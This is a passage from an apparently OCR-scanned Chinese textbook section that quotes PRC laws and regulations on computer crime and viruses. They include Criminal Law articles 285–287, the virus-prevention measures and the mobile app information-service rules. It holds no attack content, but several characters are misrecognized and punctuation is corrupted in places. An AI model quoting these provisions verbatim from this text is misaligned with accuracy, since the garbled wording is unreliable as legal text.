括 这 样 一 条 :“ 制 作 计算 机 病毒 程序 导致 他 人 损害 者 ,可 处 五 年 以 下 有 期 徒刑 .拘役 或 科 或 
并 科 20 万 元 新 台币 以 下 罚金 ”。 

此 外 ,英国 日 本 、 俄 罗斯 .法国 等 国家 也 都 制定 了 专门 的 计算 机 立法 ,用 来 约束 恶意 代 
码 攻击 等 犯罪 行为 。 
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中 国内 地 关于 计算 机 犯罪 领域 的 立法 较 晚 ,但 近年 来 却 发 展 迅 速 ,通过 了 一 系列 相关 的 
法 律 法 规 。 

1. 中 华人 民 共 和 国 刑法 

(1979 年 7 月 1 日 第 五 届 全 国人 民 代表 大 会 第 二 次 会 议 通 过 ,2015 年 8 月 29 日 第 十 二 
届 全 国人 民 代 表 大 会 常务 委员 会 第 十 六 次 会 议 通过 《刑法 修正 案 ( 九 )》 修 正 ,2015 年 11 月 1 
日 正式 施行 ) 

第 一 百 二 十 四 条 ”破坏 广播 电视 设施 .公用 电信 设施 ,危害 公共 安全 的 ,处 三 年 以 上 七 
年 以 下 有 期 徒刑 ; 造成 严重 后 果 的 ,处 七 年 以 上 有 期 徒刑 。 过 失 犯 前 款 罪 的 ,处 三 年 以 上 七 
年 以 下 有 期 徒刑 ; 情节 较 轻 的 ,处 三 年 以 下 有 期 徒刑 或 者 拘役 。 

第 二 百 八 十 五 条 违反 国家 规定 ,侵入 国家 事务 、 国 防 建设 .尖端 科学 技术 领域 的 计算 
机 信息 系统 的 ,处 三 年 以 下 有 期 徒刑 或 者 拘役 。 

违反 国家 规定 ,侵入 前 款 规定 以 外 的 计算 机 信息 系统 或 者 采用 其 他 技术 手段 ,获取 该 计 
算 机 信息 系统 中 存储 、 处 理 或 者 传输 的 数据 ,或 者 对 该 计算 机 信息 系统 实施 非法 控制 ,情节 
严重 的 ,处 三 年 以 下 有 期 徒刑 或 者 拘役 ,并 处 或 者 单 处 罚金 ; 情节 特别 严重 的 ,处 三 年 以 上 
七 年 以 下 有 期 徒刑 ,并 处 罚金 。 

提供 专门 用 于 侵入 、 非 法 控制 计算 机 信息 系统 的 程序 工具 ,或 者 明知 他 人 实施 侵入 、 非 
法 控制 计算 机 信息 系统 的 违法 犯罪 行为 而 为 其 提供 程序 .工具 ,情节 严重 的 ,依照 前 款 的 规 
定 处 罚 。 

单位 犯 前 三 款 罪 的 ,对 单位 判处 罚金 ,并 对 其 直接 负责 的 主管 人 员 和 其 他 直接 责任 人 
员 ,依照 各 该 款 的 规定 处 罚 。 

第 二 百 八 十 六 条 ”违反 国家 规定 ,对 计算 机 信息 系统 功能 进行 删除 、 修 改 、 增 加 干扰， 
造成 计算 机 信息 系统 不 能 正常 运行 ,后 果 严 重 的 ,处 五 年 以 下 有 期 徒刑 或 者 拘役 ; 后 果 特 别 
严重 的 ,处 五 年 以 上 有 期 徒刑 。 

违反 国家 规定 ,对 计算 机 信息 系统 中 存储 、 处 理 或 者 传输 的 数据 和 应 用 程序 进行 删除 、 
修改 .增加 的 操作 ,后果 严 重 的 ,依照 前 款 的 规定 处 罚 。 

故意 制作 、 传 播 计 算 机 病毒 等 破坏 性 程序 ,影响 计算 机 系统 正常 运行 ,后 果 严 重 的 ,依照 
第 一 款 的 规定 处 罚 。 

单位 犯 前 三 款 罪 的 ,对 单位 判处 罚金 ,并 对 其 直接 负责 的 主管 人 员 和 其 他 直接 责任 人 
员 ,依照 第 一 款 的 规定 处 罚 。 

第 二 百 八 十 六 条 之 一 ”网 络 服务 提供 者 不 履行 法 律 \ 行 政法 规 规定 的 信息 网 络 安全 管 
理 义 务 , 经 监管 部 门 责令 采取 改正 措施 而 拒 不 改正 ,有 下 列 情形 之 一 的 ,处 三 年 以 下 有 期 徒 
刑 、 拘 役 或 者 管制 ,并 处 或 者 单 处 罚金 : 

(一 ) 致使 违法 信息 大 量 传播 的 ; 

(二 ) 致使 用 户 信息 泄露 ,造成 严重 后 果 的 ; 

(三 ) 致使 刑事 案件 证 据 灭 失 ,情节 严重 的 ; 

(四 ) 有 其 他 严重 情节 的 。 

单位 犯 前 款 罪 的 ,对 单位 判处 罚金 ,并 对 其 直接 负责 的 主管 人 员 和 其 他 直接 责任 人 员 ， 
依照 前 款 的 规定 处 罚 。 

有 前 两 款 行为 ,同时 构成 其 他 犯罪 的 ,依照 处 罚 较 重 的 规定 定罪 处 罚 。 
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小 


第 二 百 八 十 七 条 利用 计算 机 实施 金融 诈骗 .盗窃 贪污、 挪用 公款 、 窃 取 国家 秘密 或 者 
其 他 犯罪 的 ,依照 本 法 有 关 规 定 定罪 处 罚 。 

第 二 百 八 十 七 条 之 一 “利用 信息 网 络 实施 下 列 行为 之 一 ,情节 严重 的 ,处 三 年 以 下 有 期 
徒刑 或 者 拘役 ,并 处 或 者 单 处 罚金 : 

(一 ) 设立 用 于 实施 诈骗 ,传授 犯罪 方法 、 制 作 或 者 销售 违禁 物品 .管制 物品 等 违法 犯罪 
活动 的 网 站 .通信 和 群 组 的 ; 

(二 ) 发 布 有 关 制 作 或 者 销售 毒品 、 枪 支 、. 淫 秽 物 品 等 违禁 物品 .管制 物品 或 者 其 他 违法 
犯罪 信息 的 ; 

(三 ) 为 实施 诈骗 等 违法 犯罪 活动 发 布 信息 的 。 

单位 犯 前 款 罪 的 ,对 单位 判处 罚金 ,并 对 其 直接 负责 的 主管 人 员 和 其 他 直接 责任 人 员 ， 
依照 第 一 款 的 规定 处 罚 。 

有 前 两 款 行为 ,同时 构成 其 他 犯罪 的 ,依照 处 罚 较 重 的 规定 定罪 处 罚 。 

第 二 百 八 十 七 条 之 二 ”明知 他 人 利用 信息 网 络 实施 犯罪 ,为 其 犯罪 提供 互联 网 接 入 、 服 
务 器 托管 网络 存 储 、 通 信 传 输 等 技术 支持 ,或 者 提供 广告 推广 ,支付 结算 等 帮助 ,情节 严重 
的 ,处 三 年 以 下 有 期 徒刑 或 者 拘役 ,并 处 或 者 单 处 罚金 。 

单位 犯 前 款 罪 的 ,对 单位 判处 罚金 ,并 对 其 直接 负责 的 主管 人 员 和 其 他 直接 责任 人 员 ， 
依照 第 一 款 的 规定 处 罚 。 

有 前 两 款 行为 ,同时 构成 其 他 犯罪 的 ,依照 处 罚 较 重 的 规定 定罪 处 罚 。 

2. 中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 (国务 院 第 147 号 令 ) 

(1994 年 2 月 18 日 发 布 并 实施 ,2011 年 1 月 8 日 修正 ) 

第 十 五 条 ”对 计算 机 病毒 和 和 危害 社会 公共 安全 的 其 他 有 害 数 据 的 防治 研究 工作 ,由 公 
安 部 归口 管理 。 

第 二 十 三 条 ”故意 输入 计算 机 病毒 以 及 其 他 有 害 数据 危害 计算 机 信息 系统 安全 的 ,或 
者 未 经 许可 出 售 计算 机 信息 系统 安全 专用 产品 的 ,由 公安 机 关 处 以 警告 或 者 对 个 人 处 以 
5000 元 以 下 的 罚款 、 对 单位 处 以 15 000 元 以 下 的 罚款 ; 有 违法 所 得 的 , 除 予 以 没收 外 ,可 以 
处 以 违法 所 得 1 至 3 倍 的 罚款 。 

第 二 十 八条 ”本 条 例 下 列 用 语 的 含义 : 

计算 机 病毒 ,是 指 编制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 毁坏 数据 ,影响 
计算 机 使 用 ,并 能 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 。 

第 三 十 条 ”公安 部 可 以 根据 本 条 例 制 定 实施 办 法 。 

3. 中 华人 民 共 和 国 计 算 机 信息 网 络 国际 联网 管理 暂行 规定 实施 办 法 (国信 [1998] 第 003 号 ) 

(1998 年 2 月 13 日 国务 院 信 息 化 工作 领导 小 组 发 布 并 施行 ) 

第 十 八条 ”用户 应 当 服从 接 和 单位 的 管理 ,遵守 用 户 守则 ; 不 得 擅自 进入 未 经 许可 的 
计算 机 系统 , 算 改 他 人 信息 ; 不 得 在 网 络 上 散发 恶意 信息 , 冒 用 他 人 名 义 发 出 信息 ,侵犯 他 
人 隐私 ; 不 得 制造 、 传 播 计 算 机 病毒 及 从 事 其 他 侵犯 网 络 和 他 人 合法 权益 的 活动 。 

第 二 十 条 互联 单位 、 接 人 单位 和 用 户 应 当 遵 守 国家 有 关 法 律 . 行 政法 规 , 严 格 执行 国 
家 安全 保密 制度 ; 不 得 利用 国际 联网 从 事 危 害 国家 安全 泄露 国家 秘密 等 违法 犯罪 活动 ,不 
得 制作 查阅、 复制 和 传播 妨碍 社会 治安 和 淫秽 色情 等 有 害 信息 ; 发 现 有 害 信息 应 当 及 时 向 
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有 关 主 管 部 门 报告 ,并 采取 有 效 措施 ,不 得 使 其 扩散 。 
第 二 十 三 条 ”违反 《暂行 规定 ) 及 本 办 法 ,同时 触犯 其 他 有 关 法 律 \ 行 政法 规 的 ,依照 有 
关 法 律 , 行 政法 规 的 规定 予以 处 罚 ; 构成 犯罪 的 ,依法 追究 刑事 责任 。 

第 二 十 四 条 ”与 香港 特别 行政 区 和 人 台湾、 澳门 地 区 的 计算 机 信息 网 络 的 联网 ,参照 本 办 
法 执行 。 

4. 计算 机 信息 网 络 国际 联网 安全 保护 管理 办 法 (公安 部 第 33 号 令 ) 

(1997 年 12 月 11 日 国务 院 批准 ,1997 年 12 月 30 日 公安 部 发 布 ) 

第 四 条 ”任何 单位 和 个 人 不 得 利用 国际 联网 危害 国家 安全 ,泄露 国家 秘密 ,不 得 侵犯 国 
家 的 社会 的 .集体 的 利益 和 公民 的 合法 权益 ,不 得 从 事 违法 犯罪 活动 。 

第 六 条 ”任何 单位 和 个 人 不 得 从 事 下 列 危 害 计算 机 信息 网 络 安全 的 活动 : 

(一 ) 未 经 允许 ,进入 计算 机 信息 网 络 或 者 使 用 计算 机 信息 网 络 资源 的 ; 

(二 ) 未 经 允许 ,对 计算 机 信息 网 络 功能 进行 删除 ,修改 或 者 增加 的 ; 

三 ) 未 经 允许 ,对 计算 机 信息 网 络 中 存储 、 处 理 或 者 传输 的 数据 和 应 用 程序 进行 删除 、 
修改 或 者 增加 的 ; 

(四 ) 故意 制作 ,传播 计算 机 病毒 等 破坏 性 程序 的 ; 

(五 ) 其 他 危害 计算 机 信息 网 络 安 全 的 。 

第 七 条 ”用 户 的 通信 自由 和 通信 秘密 受 法 律 保护 。 任 何 单位 和 个 人 不 得 违反 法 律 规 
定 , 利 用 国际 联网 侵犯 用 户 的 通信 自由 和 通信 秘密 。 

第 十 九条 ”公安 机 关 计 算 机 管理 监察 机 构 应 当 负 责 追 踪 和 查处 通过 计算 机 信息 网 络 的 
违法 行为 和 针对 计算 机 信息 网 络 的 犯罪 案件 ,对 违反 本 办 法 第 四 条 、 第 七 条 规定 的 违法 犯罪 
行为 ,应 当 按 照 国 家 有 关 规 定 移送 有 关 部 门 或 者 司法 机 关 处 理 。 

第 二 十 条 ”违反 法 律 \ 行 政法 规 , 有 本 办 法 第 五 条 、 第 六 条 所 列 行为 之 一 的 ,由 公安 机 关 
给 予 警告 ,有 违法 所 得 的 ,没收 违法 所 得 ,对 个 人 可 以 并 处 5000 元 以 下 的 罚款 ,对 单位 可 以 
并 处 1.5 万 元 以 下 的 罚款 ; 情节 严重 的 ,并 可 以 给 予 6 个 月 以 内 停止 联网 、 停 机 整顿 的 处 
罚 ,必要 时 可 以 建议 原 发 证 .审批 机 构 吊 销 经营 许 可 证 或 者 取消 联网 资格 ; 构成 违反 治安 管 
理 行为 的 ,依照 治安 管理 处 罚 法 的 规定 处 罚 ; 构成 犯罪 的 ,依法 追究 刑事 责任 。 

第 二 十 二 条 ”违反 本 办 法 第 四 条 、 第 七 条 规定 的 ,依照 有 关 法 律 ,法规 予 以 处 罚 。 

5. 计算 机 病毒 防治 管理 办 法 (公安 部 第 51 号 令 ) 

(2000 年 3 月 30 日 公安 部 部 长 办 公会 议 通过 ,2000 年 4 月 26 日 发 布施 行 ) 

第 一 条 ”为 了 加 强 对 计算 机 病毒 的 预防 和 治理 ,保护 计算 机 信息 系统 安全 ,保障 计算 机 
的 应 用 与 发 展 ,根据 (中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 ) 的 规定 ,制定 本 办 法 。 

第 二 条 ”本 办 法 所 称 的 计算 机 病毒 ,是 指 编 制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 
功能 或 者 毁坏 数据 ,影响 计算 机 使 用 ,并 能 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 。 

第 三 条 ”中 华人 民 共 和 国境 内 的 计算 机 信息 系统 以 及 未 联网 计算 机 的 计算 机 病毒 防治 
管理 工作 ,适用 本 办 法 。 

第 四 条 ”公安 部 公共 信息 网 络 安全 监察 部 门 主管 全 国 的 计算 机 病毒 防治 管理 工作 。 地 
方 各 级 公安 机 关 具 体 负责 本 行政 区 域内 的 计算 机 病毒 防治 管理 工作 。 

第 五 条 ”任何 单位 和 个 人 不 得 制作 计算 机 病毒 。 
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第 六 条 ”任何 单位 和 个 人 不 得 有 下 列传 播 计算 机 病毒 的 行为 : 

(一 ) 故意 输入 计算 机 病毒 ,危害 计算 机 信息 系统 安全 ; 

(二 ) 向 他 人 提供 含有 计算 机 病毒 的 文件 软件、 媒体 ; 

(三 ) 销售 出租. 附 赠 含 有 计算 机 病毒 的 媒体 ; 

(四 ) 其 他 传播 计算 机 病毒 的 行为 。 

第 七 条 ”任何 单位 和 个 人 不 得 向 社会 发 布 虚假 的 计算 机 病毒 疫情 。 

第 八条 ”从 事 计算 机 病毒 防治 产品 生产 的 单位 ,应 当 及 时 向 公安 部 公共 信息 网 络 安全 
监察 部 门 批准 的 计算 机 病毒 防治 产品 检测 机 构 提 交 病 毒 样本 。 

第 九条 ”计算 机 病毒 防治 产品 检测 机 构 应 当 对 提交 的 病毒 样本 及 时 进行 分 析 、 确 认 , 并 
将 确认 结果 上 报 公安 部 公共 信息 网 络 安全 监察 部 门 。 

第 十 条 ”对 计算 机 病毒 的 认定 工作 ,由 公安 部 公共 信息 网 络 安 全 监察 部 门 批准 的 机 构 
承担 。 

第 十 一 条 ”计算 机 信息 系统 的 使 用 单位 在 计算 机 病毒 防治 工作 中 应 当 履 行 下 列 职责 : 

(一 ) 建立 本 单位 的 计算 机 病毒 防治 管理 制度 ; 

(二 ) 采取 计算 机 病毒 安全 技术 防治 措施 ; 

三 ) 对 本 单位 计算 机 信息 系统 使 用 人 员 进 行 计算 机 病毒 防治 教育 和 培训 ; 

(四 ) 及 时 检测 、 清 除 计算 机 信息 系统 中 的 计算 机 病毒 ,并 备 有 检测 、 清 除 的 记录 ; 

(五 ) 使 用 具有 计算 机 信息 系统 安全 专用 产品 销售 许可 证 的 计算 机 病毒 防治 产品 ; 

(六 ) 对 因 计 算 机 病毒 引起 的 计算 机 信息 系统 瘫痪 、 程 序 和 数据 严重 破坏 等 重大 事故 及 
时 向 公安 机 关 报 告 ,并 保护 现场 。 

第 十 二 条 ”任何 单位 和 个 人 在 从 计算 机 信息 网 络 上 下 载 程序 .数据 或 者 购置 .维修 、 借 
人 计算 机 设备 时 ,应 当 进 行 计算 机 病毒 检测 。 

第 十 三 条 ”任何 单位 和 个 人 销售 、 附 赠 的 计算 机 病毒 防治 产品 ,应 当 具 有 计算 机 信息 系 
统 安全 专用 产品 销售 许可 证 ,并 贴 有 “销售 许可 ”标记 。 

第 十 四 条 “从事 计算 机 设备 或 者 媒体 生产 、 销 售 出租、 维修 行业 的 单位 和 个 人 ,应 当 对 
计算 机 设备 或 者 媒体 进行 计算 机 病毒 检测 清除 工 作 ,并 备 有 检测 、 清 除 的 记录 。 

第 十 五 条 ”任何 单位 和 个 人 应 当 接 受 公安 机 关 对 计算 机 病毒 防治 工作 的 监督 .检查 和 
指导 。 

第 十 六 条 ”在 非 经 营 活动 中 有 违反 本 办 法 第 五 条 、 第 六 条 第 二 ,三 、 四 项 规定 行为 之 一 
的 ,由 公安 机 关 处 以 一 千 元 以 下 罚款 。 

在 经 营 活动 中 有 违反 本 办 法 第 五 条 、 第 六 条 第 二 三、 四 项 规定 行为 之 一 ,没有 违法 所 得 
的 ,由 公安 机 关 对 单位 处 以 一 万 元 以 下 罚款 ,对 个 人 处 以 五 千 元 以 下 罚款 ， 有 违法 所 得 的 ， 
处 以 违法 所 得 三 倍 以 下 罚款 ,但 是 最 高 不 得 超过 三 万 元 。 

违反 本 办 法 第 六 条 第 一 项 规定 的 ,依照 (中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 
例 ) 第 二 十 三 条 的 规定 处 罚 。 

第 十 七 条 ”违反 本 办 法 第 七 条 、 第 八条 规定 行为 之 一 的 ,由 公安 机 关 对 单位 处 以 一 千 元 
以 下 罚款 ,对 单位 直接 负责 的 主管 人 员 和 直接 责任 人 员 处 以 五 百 元 以 下 罚款 ; 对 个 人 处 以 
五 百 元 以 下 罚款 。 

第 十 八条 ”违反 本 办 法 第 九条 规定 的 ,由 公安 机 关 处 以 警告 ,并 责令 其 限期 改正 ; 逾期 
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不 改正 的 ,取消 其 计算 机 病毒 防治 产品 检测 机 构 的 检测 资格 。 

第 十 九条 ”计算 机 信息 系统 的 使 用 单位 有 下 列 行为 之 一 的 ,由 公安 机 关 处 以 警告 ,并 根 
据 情况 责令 其 限期 改正 ; 逾期 不 改正 的 ,对 单位 处 以 一 千 元 以 下 罚款 ,对 单位 直接 负责 的 主 
管 人 员 和 直接 责任 人 员 处 以 五 百 元 以 下 罚款 : 

(一 ) 未 建立 本 单位 计算 机 病毒 防治 管理 制度 的 ; 

(二 ) 未 采取 计算 机 病毒 安全 技术 防治 措施 的 ; 

(三 ) 未 对 本 单位 计算 机 信息 系统 使 用 人 员 进 行 计算 机 病毒 防治 教育 和 培训 的 ; 

(四 ) 未 及 时 检测 ,清除 计算 机 信息 系统 中 的 计算 机 病毒 ,对 计算 机 信息 系统 造成 危 
害 的 ; 

(五 ) 未 使 用 具有 计算 机 信息 系统 安全 专用 产品 销售 许可 证 的 计算 机 病毒 防治 产品 ,对 
计算 机 信息 系统 造成 危害 的 。 

第 二 十 条 ”违反 本 办 法 第 十 四 条 规定 ,没有 违法 所 得 的 ,由 公安 机 关 对 单位 处 以 一 万 元 
以 下 罚款 ,对 个 人 处 以 五 千 元 以 下 罚款 ; 有 违法 所 得 的 ,处 以 违法 所 得 三 倍 以 下 罚款 ,但 是 
最 高 不 得 超过 三 万 元 。 

第 二 十 一 条 ”本 办 法 所 称 计算 机 病毒 疫情 ,是 指 某 种 计算 机 病毒 爆发 .流行 的 时 间 、 范 
围 .破坏 特点 ,破坏 后 果 等 情况 的 报告 或 者 预报 。 

本 办 法 所 称 媒体 ,是 指 计算 机 软盘 、 硬 盘 、 磁 带 、 光 盘 等 。 

第 二 十 二 条 ”本 办 法 自发 布 之 日 起 施行 。 

6. 全 国人 民 代 表 大 会 常务 委员 会 关于 维护 互联 网 安全 的 决定 

(2000 年 12 月 28 日 第 九 届 全 国人 民 代表 大 会 常务 委员 会 第 十 九 次 会 议 通过 ,2009 年 
8 月 27 日 修订 ) 

我 国 的 互联 网 ,在 国家 大 力 倡导 和 积极 推动 下 ,在 经 济 建设 和 各 项 事业 中 得 到 日 益 广泛 
的 应 用 ,使 人 们 的 生产 、 工 作 、 学 习 和 生活 方式 已 经 开始 并 将 继续 发 生 深刻 的 变化 ,对 于 加 快 
我 国 国民 经 济 、 科 学 技术 的 发 展 和 社会 服务 信息 化 进程 具有 重要 作用 。 同 时 ,如 何 保障 互联 
网 的 运行 安全 和 信息 安全 问题 已 经 引起 全 社会 的 普遍 关注 。 为 了 兴 利 除 弊 , 促 进 我 国 互联 
网 的 健康 发 展 , 维 护 国家 安全 和 社会 公共 利益 ,保护 个 人 .法 人 和 其 他 组 织 的 合法 权益 , 特 作 
如 下 决定 : 

一 、 为 了 保障 互联 网 的 运行 安全 ,对 有 下 列 行为 之 一 ,构成 犯罪 的 ,依照 刑法 有 关 规 定 
追究 刑事 责任 : 

(一 ) 侵入 国家 事务 .国防 建设 、 尖 端 科学 技术 领域 的 计算 机 信息 系统 ; 

(二 ) 故意 制作 ,传播 计算 机 病毒 等 破坏 性 程序 ,攻击 计算 机 系统 及 通信 和 网络, 致使 计算 
机 系统 及 通信 网 络 遭 受 损害 ; 

(三 ) 违反 国家 规定 ,擅自 中 断 计算 机 网 络 或 者 通信 服务 ,造成 计算 机 网 络 或 者 通信 系 
统 不 能 正常 运行 。 

二 、 为 了 保护 个 人 、 法 人 和 其 他 组 织 的 人 身 、 财 产 等 合法 权利 ,对 有 下 列 行为 之 一 ,构成 
犯罪 的 ,依照 刑法 有 关 规 定 追 究 刑事 责任 : 

(一 ) 利用 互联 网 侮辱 他 人 或 者 捏造 事实 诽谤 他 人 ， 

(二 ) 非法 截获 、 自 改 、 删 除 他 人 电子 邮件 或 者 其 他 数据 资料 ,侵犯 公民 通信 自由 和 通信 
秘密 ; 
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(三 ) 利用 互联 网 进行 盗窃 、 诈 骗 、 项 诈 勒 索 。 

7. 互联 网 上 网 服务 营业 场所 管理 条 例 (国务 院 第 363 号 令 ) 

(2002 年 9 月 29 日 中 华人 民 共 和 国 国务 院 令 第 363 号 公布 ,2011 年 1 月 8 日 第 一 次 修 
订 ,2016 年 2 月 6 日 第 二 次 修订 ) 

第 十 五 条 互联 网 上 网 服务 营业 场所 经 营 单位 和 上 网 消费 者 不 得 进行 下 列 危害 信息 网 
络 安 全 的 活动 : 

(一 ) 故意 制作 或 者 传播 计算 机 病毒 以 及 其 他 破坏 性 程序 的 ; 

(二 ) 非法 侵入 计算 机 信息 系统 或 者 破坏 计算 机 信息 系统 功能 .数据 和 应 用 程序 的 ， 

(三 ) 进行 法 律 , 行 政法 规 禁止 的 其 他 活动 的 。 

第 十 九条 ”互联 网 上 网 服务 营业 场所 经 营 单位 应 当 实 施 经 营 管理 技术 措施 ,建立 场 内 
巡查 制度 ,发 现 上 网 消费 者 有 本 条 例 第 十 四 条 、 第 十 五 条 、 第 十 八条 所 列 行为 或 者 有 其 他 违 
法 行为 的 ,应 当 立 即 予 以 制止 并 向 文化 行政 部 门 、 公 安 机 关 举 报 。 

8. 中 华人 民 共和 国治 安 管理 处 罚 法 

(2005 年 8 月 28 日 第 十 届 全 国人 民 代 表 大 会 常务 委员 会 第 十 七 次 会 议 通过 , 自 2006 年 
3 月 1 日 起 施行 。2012 年 10 月 26 日 十 一 届 全 国人 大 常委 会 第 29 次 会 议 通 过 修订 ) 

第 二 十 九条 ”有 下 列 行为 之 一 的 ,处 五 日 以 下 拘留 ; 情节 较 重 的 ,处 五 日 以 上 十 日 以 下 
拘留 : 

(一 ) 违反 国家 规定 ,侵入 计算 机 信息 系统 ,造成 危害 的 ; 

(二 ) 违反 国家 规定 ,对 计算 机 信息 系统 功能 进行 删除 ,修改 、 增 加 干扰 ,造成 计算 机 信 
息 系 统 不 能 正常 运行 的 ; 

(三 ) 违反 国家 规定 ,对 计算 机 信息 系统 中 存储 、 人 处理, 传输 的 数据 和 应 用 程序 进行 市 
除 、 修 改 .增加 的 ; 

(四 ) 故意 制作 、 传 播 计算 机 病毒 等 破坏 性 程序 ,影响 计算 机 信息 系统 正常 运行 的 。 

9. 互联 网 安全 保护 技术 措施 规定 (公安 部 第 82 号 令 ) 

(2005 年 11 月 23 日 公安 部 部 长 办 公会 议 通 过 , 自 2006 年 3 月 1 日 起 施行 ) 

第 七 条 ”互联 网 服务 提供 者 和 联网 使 用 单位 应 当 落实 以 下 互联 网 安全 保护 技术 措施 : 

(一 ) 防范 计算 机 病毒 .网络 和 人 侵 和 攻击 破坏 等 危害 网 络 安全 事项 或 者 行为 的 技术 
措施 ; 
(二 ) 重要 数据 库 和 系统 主要 设备 的 元 灾 备 份 措施 ; 

(三 ) 记录 并 留存 用 户 登录 和 退出 时 间 、 主 叫 号 码 、 账 号 ,互联 网 地 址 或 域名 、 系 统 维 护 
日 志 的 技术 措施 ; 

(四 ) 法 律 、 法 规 和 规章 规定 应 当 落 实 的 其 他 安全 保护 技术 措施 。 

第 九条 ”提供 互联 网 信息 服务 的 单位 除 落实 本 规定 第 七 条 规定 的 互联 网 安全 保护 技术 
措施 外 ,还 应 当 落 实 具 有 以 下 功能 的 安全 保护 技术 措施 : 

(一 ) 在 公共 信息 服务 中 发 现 、 停 止 传输 违法 信息 ,并 保留 相关 记录 ; 

(二 ) 提供 新 闻 、 出 版 以 及 电子 公告 等 服务 的 ,能 够 记录 并 留存 发 布 的 信息 内 容 及 发 布 
时 间 ; 

(三 ) 开办 门户 网 站 ,新 闻 网 站 、 电 子 商务 网 站 的 ,能 够 防范 网 站 、 网 页 被 臭 改 ,被 算 改 后 
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能 够 自动 恢复 ; 

(四 ) 开办 电子 公告 服务 的 ,具有 用 户 注册 信息 和 发 布 信 息 审计 功能 ; 

(五 ) 开办 电子 邮件 和 网 上 短信 息 服务 的 ,能 够 防范 、 清 除 以 群发 方式 发 送 伪 造 、 隐 匿 信 
息 发 送 者 真实 标记 的 电子 邮件 或 者 短信 息 。 

第 十 五 条 ”违反 本 规定 第 七 条 至 第 十 四 条 规定 的 ,由 公安 机 关 依 照 ( 计 算 机 信息 网 络 国 
际 联网 安全 保护 管理 办 法 ) 第 二 十 一 条 的 规定 予以 处 罚 。 

10. 移动 互联 网 应 用 程序 信息 服务 管理 规定 

2016 年 6 月 28 日 《移动 互联 网 应 用 程序 信息 服务 管理 规定 》 由 国家 互联 网 信息 办 公 
室 发 布 , 自 2016 年 8 月 1 日 起 实施 。 

《规定 ) 首 次 明确 了 国家 网 信 办 作为 移动 应 用 程序 信息 服务 的 主管 单位 。 侧 重 维 护 市 场 
中 弱势 一 方 一 一 网 民 的 个 人 信息 与 合法 权益 的 保护 ,本 着 为 民 、 便 民 、 惠 民 的 宗旨 ,针对 应 用 
程序 市 场 中 的 难点 和 痛 点 ,如 普通 网 民 防 不 胜 防 的 诱导 式 安装 、 过 度 收 集 用 户 信 息 、 过 度 获 
取 功 能 权限 ,甚至 可 能 遭遇 的 恶意 扣 费 和 被 盗 等 安全 问题 ,都 给 出 了 明确 规定 ,加 强 了 APP 
信息 服务 规范 管理 ,进一步 把 APP 服务 市 场 纳入 法 制 化 轨道 ,充分 保护 了 消费 者 的 知情 权 、 
选择 权 、 自 由 交易 权 和 隐私 权 等 权利 ,促进 行业 健康 有 序 发 展 。 

此 外 《规定 ) 的 第 四 条 明确 提出 “鼓励 各 级 党 政 机 关 . 企 事业 单位 和 各 人 民团 体积 极 运 
用 移动 互联 网 应 用 程序 ,推进 政务 公开 ,提供 公共 服务 ,促进 经 济 社会 发 展 ”, 使 治 网 思路 与 
时 俱 进 。 

更 重要 的 是 (规定 》 还 为 网 民 解 决 了 经 常 遭 遇 问题 而 投诉 无 门 的 尴 炊 和 困境 ,投诉 的 便 
捷 性 和 高 效 性 ,以 及 处 理 机 制 的 有 效 性 ,是 法 律 法 规 能 否 真 正 见 成 效 的 关键 所 在 。 

第 一 条 ”为 加 强 对 移动 互联 网 应 用 程序 (APP) 信 息 服务 的 管理 ,保护 公民 ,法 人 和 其 他 
组 织 的 合法 权益 ,维护 国家 安全 和 公共 利益 ,根据 (全 国人 民 代 表 大 会 常务 委员 会 关于 加 强 
网 络 信息 保护 的 决定 》) 和 《国务 院 关 于 授权 国家 互联 网 信息 办 公 室 负责 互联 网 信息 内 容 管理 
工作 的 通知 》, 制 定 本 规定 。 

第 二 条 ”在 中 华人 民 共 和 国境 内 通过 移动 互联 网 应 用 程序 提供 信息 服务 ,从 事 互联 网 
应 用 商店 服务 ,应 当 遵 守 本 规定 。 

本 规定 所 称 移动 互联 网 应 用 程序 ,是 指 通 过 预 装 、 下 载 等 方式 获取 并 运行 在 移动 智能 终 
端 上 、 向 用 户 提供 信息 服务 的 应 用 软件 。 

本 规定 所 称 移动 互联 网 应 用 程序 提供 者 ,是 指 提 供 信息 服务 的 移动 互联 网 应 用 程序 所 
有 者 或 运营 者 。 

本 规定 所 称 互联 网 应 用 商店 ,是 指 通 过 互联 网 提供 应 用 软件 浏览 ,搜索 、 下 载 或 开发 工 
具 和 产品 发 布 服 务 的 平台 

第 三 条 国家 互联 网 信息 办 公 室 负责 全 国 移动 互联 网 应 用 程序 信息 内 容 的 监督 管理 执 
法 工作 。 地 方 互 联网 信息 办 公 室 依据 职责 负责 本 行政 区 域内 的 移动 互联 网 应 用 程序 信息 内 
容 的 监督 管理 执法 工作 。 

第 四 条 ”鼓励 各 级 党 政 机 关 、 企 事业 单位 和 各 人 民团 体积 极 运 用 移动 互联 网 应 用 程序 ， 
推进 政务 公开 ,提供 公共 服务 ,促进 经 济 社会 发 展 。 

第 五 条 ”通过 移动 互联 网 应 用 程序 提供 信息 服务 ,应 当 依 法 取得 法 律 法 规 规定 的 相关 
资质 。 从 事 互 联网 应 用 商店 服务 ,还 应 当 在 业务 上 线 运 营 三 十 日 内 向 所 在 地 省 、 自 治 区 、 直 
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辖 市 互联 网 信息 办 公 室 备案 。 

第 六 条 ”移动 互联 网 应 用 程序 提供 者 和 互联 网 应 用 商店 服务 提供 者 不 得 利用 移动 
互联 网 应 用 程序 从 事 危 害 国 家 安全 ,扰乱 社会 秩序 ,侵犯 他 人 合法 权益 等 法 律 法 规 禁 
止 的 活动 ,不 得 利用 移动 互联 网 应 用 程序 制作 、 复 制 、 发 布 .传播 法 律 法 规 禁 止 的 信息 
内 容 。 

第 七 条 ”移动 互联 网 应 用 程序 提供 者 应 当 严 格 落实 信息 安全 管理 责任 ,依法 履行 以 下 
义务 : 

(一 ) 按照 “后 台 实 名 ,前台 自愿 ”的 原则 ,对 注册 用 户 进行 基于 移动 电话 号 码 等 真实 身 
份 信息 认证 。 

(二 ) 建立 健全 用 户 信息 安全 保护 机 制 , 收 集 、 使 用 用 户 个 人 信息 应 当 遵循 合法 、 正 当 、 
